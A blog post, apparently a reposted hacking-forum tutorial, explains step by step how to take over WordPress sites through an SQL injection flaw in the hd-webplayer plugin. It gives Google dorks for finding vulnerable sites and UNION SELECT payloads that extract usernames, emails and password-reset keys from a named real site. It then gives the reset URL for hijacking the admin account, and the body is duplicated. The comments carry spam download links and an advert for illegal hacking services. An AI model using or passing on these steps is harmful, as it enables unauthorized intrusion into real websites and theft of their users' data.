Hack WordPress site with SQL injection
As requested by few of you i decided to make this small tutorial on how to hack a wordpress site that has an SQLi in plugin.
So lets begin.
I will use this 0day here by AMY hacker.
First of all we need to find a vulnerable page.
We enter this in Google:
When you found your site you need to find admin email and username.
I will be using this site for example:
![[Image: regiont.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sIoOqmbGiLu9CG0FhOMQ2d865eWzZbWlSrlhL3tjqC7U3dev_sNxVZIphp8YnUGovwGSCjpCAE8FsbUr-cXuznuq5pIVEHruao96puGTSgNotvaNX_=s0-d)
When i add ' text disappears so it is vulnerable.
![[Image: regionzn.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vRBSokS8W2LEl1bYPuaKVUmhuBxqVDmGjgHpfkdvKFmGc1hjrUKls4-zEEAHZ0lH9HQOkJM7ix9RYdY0A5_IhvUAQVKqFql4WEJwBdO5yCeGHwMDpL=s0-d)
NOTE: I will not demonstrate how to SQL inject.
Now we need admin username and email.
We need to inject:
Now we have 2 users.
![[Image: regionjhg.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uHEdv7JFij2QywgU06HrneRDrNTMjGS3LLCNGtcrWvU7BuNPXRBGJU3n4fVs5U_uFyTNIt-3mgVBn8t_YxEN9kFTradRlnY-w5kcxZDOR-wDy6TVaTHWE=s0-d)
We pick one and copy his email.
Go to the login page of the site.
It is usually here:
And press "Lost your password?"
![[Image: regionz.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uoEr_Op0VOi7Pywkk00T4XZs8yprQgzKpqRnp3BWDmrJphCZePqLXhGEtVLgdmmyvqnIezWBJ1VHwdDByc1M_mb-r37HQjawrh34xN29yNx3RwXWc=s0-d)
Now you enter either username or email.
We can enter both so it doesnt matter.
I entered email.
![[Image: regionby.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_urgf_xTAYt6NZSrto1WoGbou2oPOeGyZiEkcbE9BuknGGt_IpzIS7hoerpJXU8oYnqWDMumXrM2ZT5VbM7cxdU7P3lsfRmbBf2sHU5_u1bgRjm7vqKeSw=s0-d)
![[Image: regionng.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vee2deiGi_LYr0wcGcWaO7Zz_V5szNcXul5wUJFq7eSnwV3t4MgkLkvRlEcf9sDzvAnCVBAfSkrugSxLHYHB9LcDy0QVFqt9kQ-HWEhTqX6jDy8K3x=s0-d)
Now when you got:
"Check your e-mail for the confirmation link."
It means that reset key is successfully sent.
Now we need to get the activation key.
Go back to the syntax you used for extracting email and username and do this:
![[Image: regiongn.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t_FI2ZhSMQQVXcs5r-_76dTA3AY0PTF_hLVLB0k8ijOZlNVG86aE7t9l8j0vyRvL5MFzD8fVd8piIQeafg7Q6U9jlKM2pa9cLPpVXQqG0iwmdbunbU=s0-d)
Voila!
Now we just need to reset it.
Go to:
NOTE: Replace key= & login=
So my link will be:
![[Image: regionzi.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tFoJlyWKPQ-O-nFIF_FGs4cI1ohEO8f4Emgj0lEuA4ugug_uAjfb0J9Uiv5vNPFIZa9CPS6Um4_WNpoNSwlTIzK8fN5PvkyZNB1ga9Rr46KOe05jt9Oxg=s0-d)
Enter new password:
![[Image: thefreenudecelebritysit.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vv9ltxm58yYwrFogr3H-69_Fi18_NmXJsKVDUNjBs9QPhgkK9OBvkDFwfVl5Xg-ZjVYpeT7Z1U5k4jyyEZ8nTzkbKXHCx4ZdrjpvKSgKg6pRQX8qDK3mRzZCIOVhaGEcPpuWPt=s0-d)
![[Image: regiongv.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_syJ5E3-XIqNbeHWsb_oG4kXgWYyaORpJy0bf2pZkAU3lC8CyXz_lfXpduukg45FhTa_aoRmMmrqfzifztXHrOfOykY_bTuZ14fRFG1_myjZpom5MAsz1Q=s0-d)
Login with new password and shell it.
That's it guys.
Thanks for reading!
As requested by few of you i decided to make this small tutorial on how to hack a wordpress site that has an SQLi in plugin.
So lets begin.
I will use this 0day here by AMY hacker.
First of all we need to find a vulnerable page.
We enter this in Google:
Code:
# Dork 1 (config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="
# Dork 2 (playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="
# Dork 3 (General):
inurl:"/wp-content/plugins/hd-webplayer/"When you found your site you need to find admin email and username.
I will be using this site for example:
Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=3When i add ' text disappears so it is vulnerable.
NOTE: I will not demonstrate how to SQL inject.
Now we need admin username and email.
We need to inject:
Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--Now we have 2 users.
We pick one and copy his email.
Go to the login page of the site.
It is usually here:
Code:
http://www.site.com/wp-login.phpAnd press "Lost your password?"
Now you enter either username or email.
We can enter both so it doesnt matter.
I entered email.
Now when you got:
"Check your e-mail for the confirmation link."
It means that reset key is successfully sent.
Now we need to get the activation key.
Go back to the syntax you used for extracting email and username and do this:
Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11 FROM wp_users--Voila!
Now we just need to reset it.
Go to:
Code:
wp-login.php?action=rp&key=resetkey&login=usernameNOTE: Replace key= & login=
So my link will be:
Enter new password:
Login with new password and shell it.
That's it guys.
Thanks for reading!
this is hard, can you help me?
ReplyDelete[Tutorial] Hack Wordpress Site With Sql Injection >>>>> Download Now
Delete>>>>> Download Full
[Tutorial] Hack Wordpress Site With Sql Injection >>>>> Download LINK
>>>>> Download Now
[Tutorial] Hack Wordpress Site With Sql Injection >>>>> Download Full
>>>>> Download LINK 2k
Nice post i get good exprience from the post... waiting for new one. wordpress is the best CMS i think.
ReplyDeletewordpress speed up plugin
wordpress tutorials
That is really interesting, You are an excessively professional
ReplyDeleteblogger. I have joined your rss feed and stay up for in the
hunt for extra of your excellent post.
Take a look at my weblog :: Technology Bank
Do you need to increase your credit score?
ReplyDeleteDo you intend to upgrade your school grade?
Do you want to hack your cheating spouse Email, whatsapp, Facebook, instagram or any social network?
Do you need any information concerning any database.
Do you need to retrieve deleted files?
Do you need to clear your criminal records or DMV?
Do you want to remove any site or link from any blog?
you should contact this hacker, he is reliable and good at the hack jobs..
contact : cybergoldenhacker at gmail dot com
[Tutorial] Hack Wordpress Site With Sql Injection >>>>> Download Now
ReplyDelete>>>>> Download Full
[Tutorial] Hack Wordpress Site With Sql Injection >>>>> Download LINK
>>>>> Download Now
[Tutorial] Hack Wordpress Site With Sql Injection >>>>> Download Full
>>>>> Download LINK